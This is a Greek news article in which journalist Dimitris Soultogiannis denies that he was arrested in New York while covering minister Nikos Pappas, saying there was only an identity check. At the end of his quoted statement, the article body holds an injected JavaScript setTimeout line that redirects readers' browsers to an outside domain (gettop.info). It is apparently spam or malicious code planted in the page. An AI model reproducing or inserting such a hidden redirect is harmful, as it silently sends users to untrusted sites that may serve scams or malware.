Ο Δημ. Σουλτογιάννης αποκαλύπτει τι συνέβη στη Νέα Υόρκη (ΒΙΝΤΕΟ)

0
6

 

Τη σιωπή του έλυσε ο δημοσιογράφος Δημήτρης Σουλτογιάννης που οι φήμες τον έφεραν να συνελήφθη μεταμφιεσμένος στη Νέα Υόρκη παρακολουθώντας τον υπουργό Επκρατείας Νίκο Παππά.

Μιλώντας στην εκπομπή «Tatiana Live»ξεκαθαρίζει τι συνέβη στην πόλη του Μεγάλου Μήλου αλλά και πως ποτέ δεν συνελήφθη.  

«Με τον συνάδελφο από τον Alpha, τον Θάνο Δημάδη αποφασίσαμε το απόγευμα της ίδιας ημέρας να επιστρέψουμε στο ξενοδοχείο. Πήγαμε και κάτσαμε στο καφέ του ξενοδοχείου. Με φωτογραφικές μηχανές, με iphone στα χέρια για να κάνουμε το ρεπορτάζ μας ή έστω το φωτορεπορτάζ μας. Αποφάσισα αυτοβούλως να καλύψω τον κ. Παππά σε όλα τα επίπεδα, από τη στιγμή που δεν πήρα καμία απάντηση από τον Οργανισμό Ηνωμένων Εθνών, καμία απάντηση από τον ίδιο, καμία απάντηση από το γραφείο τύπου της Νέας Υόρκης. Η ένδυση μέσα στο ξενοδοχείο είναι ένα απλό καπέλο τζόκεϊ και απλά γυαλιά ηλίου.

Οποιαδήποτε μέσα αμφίεσης βρισκόντουσαν μέσα σε τσάντες και αυτό που είχαμε σκεφτεί ήταν ότι αν έρθει και ξαναφύγει, με άλλη αμφίεση θα τον ακολουθήσουμε στον επόμενο προορισμό του. Ο κ. Παππάς επέστρεψε, οι φωτογραφίες παίρνονται κι εμείς φεύγουμε από το ξενοδοχείο. Βγήκαμε έξω από το ξενοδοχείο και άνθρωπος του Νίκου Παππά ζήτησε από τις μυστικές υπηρεσίες να κάνουν εξακρίβωση. Κι έτσι, λοιπόν, περνάμε στην εξακρίβωση των στοιχείων. Η εξακρίβωση έγινε στο απέναντι πεζοδρόμιο, μας ζητάνε να βγάλουμε τις ταυτότητές μας, τα διαπιστευτήριά μας τα δημοσιογραφικά, να βγάλουμε ότι έχουμε μέσα στις τσάντες μας και αρχίζει η καταγραφή του γεγονότος, που απ’ όσο γνωρίζω αυτή τη στιγμή δημιουργείται η αστυνομική αναφορά, την οποία ο δικηγόρος μου θα έχει στα χέρια του αύριο«.

Ο δημοσιογράφος διευκρινίζει ότι δνε υπήρξε ποτέ σύλληψη απλώς ταυτοποίηση στοιχείων: «Αφού έγινε μια απλή πιστοποίηση των γεγονότων, παρών ήταν οι αμερικανικές μυστικές υπηρεσίες και ο άνθρωπος αυτός που μας “έδωσε”, μας ζητάνε με την άδειά μας να βγάλουμε φωτογραφίες. Να βγάλουν φωτογραφίες του περιστατικού, των αστυνομικών μας ταυτοτήτων. Και η υπόθεση κλείνει εκεί, το Σάββατο το απόγευμα. Σύλληψη δεν υπήρξε ποτέ, υπήρχε ταυτοποίηση των στοιχείων. Οι περούκες ήταν στην τσάντα. Δεν θεώρησα εγώ ποτέ προσωπικά ότι θα μπορούσα να βρίσκομαι με περούκα στο ξενοδοχείο Westin της Νέας Υόρκης και να μην με πάρει κανένας χαμπάρι». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here